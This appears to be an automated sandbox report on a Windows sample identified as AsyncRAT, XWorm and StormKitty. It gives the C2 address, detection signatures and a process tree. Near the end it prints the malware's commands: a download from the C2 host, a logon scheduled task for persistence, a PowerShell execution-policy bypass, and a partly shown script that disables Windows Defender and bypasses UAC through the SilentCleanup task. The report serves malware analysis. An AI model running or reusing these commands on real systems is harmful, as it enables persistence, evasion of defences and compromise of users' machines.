Analysis

  • max time kernel
    213s
  • max time network
    214s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    26-12-2024 12:40

General

Malware Config

Extracted

Family

asyncrat

Version

Tsurugi RATs

Botnet

Default

C2

213.136.90.188:4449

Mutex

zteprqyjlfgxrxuaid

Attributes
  • delay

    1

  • install

    true

  • install_file

    Check Windows Update.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

xworm

C2

213.136.90.188:7000

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Microsoft Edgs.exe

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Start PowerShell.

  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 3 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://213.136.90.188:8081/
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3448
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x124,0x134,0x7ffc5cac46f8,0x7ffc5cac4708,0x7ffc5cac4718
      2⤵
        PID:4012
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        2⤵
          PID:240
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:336
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
          2⤵
            PID:4312
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
            2⤵
              PID:3668
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
              2⤵
                PID:4192
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5044 /prefetch:8
                2⤵
                  PID:4016
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                  2⤵
                  • Drops file in Program Files directory
                  PID:1540
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff7dfc65460,0x7ff7dfc65470,0x7ff7dfc65480
                    3⤵
                      PID:4356
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5044 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:480
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5516 /prefetch:8
                    2⤵
                      PID:5068
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
                      2⤵
                        PID:1056
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6364 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5128
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6472 /prefetch:8
                        2⤵
                          PID:5148
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:1
                          2⤵
                            PID:5280
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
                            2⤵
                              PID:5288
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
                              2⤵
                                PID:5468
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6792 /prefetch:1
                                2⤵
                                  PID:5476
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
                                  2⤵
                                    PID:5716
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:1
                                    2⤵
                                      PID:5960
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6332 /prefetch:1
                                      2⤵
                                        PID:5968
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6888 /prefetch:1
                                        2⤵
                                          PID:6104
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
                                          2⤵
                                            PID:5056
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6780 /prefetch:8
                                            2⤵
                                            • Modifies registry class
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious behavior: GetForegroundWindowSpam
                                            • Suspicious use of SetWindowsHookEx
                                            PID:5828
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6752 /prefetch:8
                                            2⤵
                                              PID:5840
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
                                              2⤵
                                                PID:3612
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
                                                2⤵
                                                  PID:3480
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
                                                  2⤵
                                                    PID:5632
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:1
                                                    2⤵
                                                      PID:5516
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
                                                      2⤵
                                                        PID:5784
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
                                                        2⤵
                                                          PID:5636
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6992 /prefetch:8
                                                          2⤵
                                                            PID:5696
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4876 /prefetch:8
                                                            2⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:5620
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2088 /prefetch:8
                                                            2⤵
                                                              PID:5520
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=220 /prefetch:8
                                                              2⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:2076
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6764 /prefetch:8
                                                              2⤵
                                                              • Modifies registry class
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5280
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5008 /prefetch:8
                                                              2⤵
                                                              • Modifies registry class
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:2392
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=900 /prefetch:8
                                                              2⤵
                                                                PID:5596
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,11409855310342533471,6482083825400239132,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3520 /prefetch:2
                                                                2⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:3832
                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                              1⤵
                                                                PID:4112
                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                1⤵
                                                                  PID:2412
                                                                • C:\Users\Admin\Downloads\MSSQL_Services.exe
                                                                  "C:\Users\Admin\Downloads\MSSQL_Services.exe"
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  PID:3504
                                                                • C:\Users\Admin\Downloads\TsurugiClient.exe
                                                                  "C:\Users\Admin\Downloads\TsurugiClient.exe"
                                                                  1⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3544
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Check Windows Update" /tr '"C:\Users\Admin\AppData\Roaming\Check Windows Update.exe"' & exit
                                                                    2⤵
                                                                      PID:5336
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks /create /f /sc onlogon /rl highest /tn "Check Windows Update" /tr '"C:\Users\Admin\AppData\Roaming\Check Windows Update.exe"'
                                                                        3⤵
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:6064
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp82D2.tmp.bat""
                                                                      2⤵
                                                                        PID:5976
                                                                        • C:\Windows\system32\timeout.exe
                                                                          timeout 3
                                                                          3⤵
                                                                          • Delays execution with timeout.exe
                                                                          PID:420
                                                                        • C:\Users\Admin\AppData\Roaming\Check Windows Update.exe
                                                                          "C:\Users\Admin\AppData\Roaming\Check Windows Update.exe"
                                                                          3⤵
                                                                          • UAC bypass
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          • System policy modification
                                                                          PID:4692
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\XClient.exe"' & exit
                                                                            4⤵
                                                                              PID:5024
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\XClient.exe"'
                                                                                5⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5096
                                                                                • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1928
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
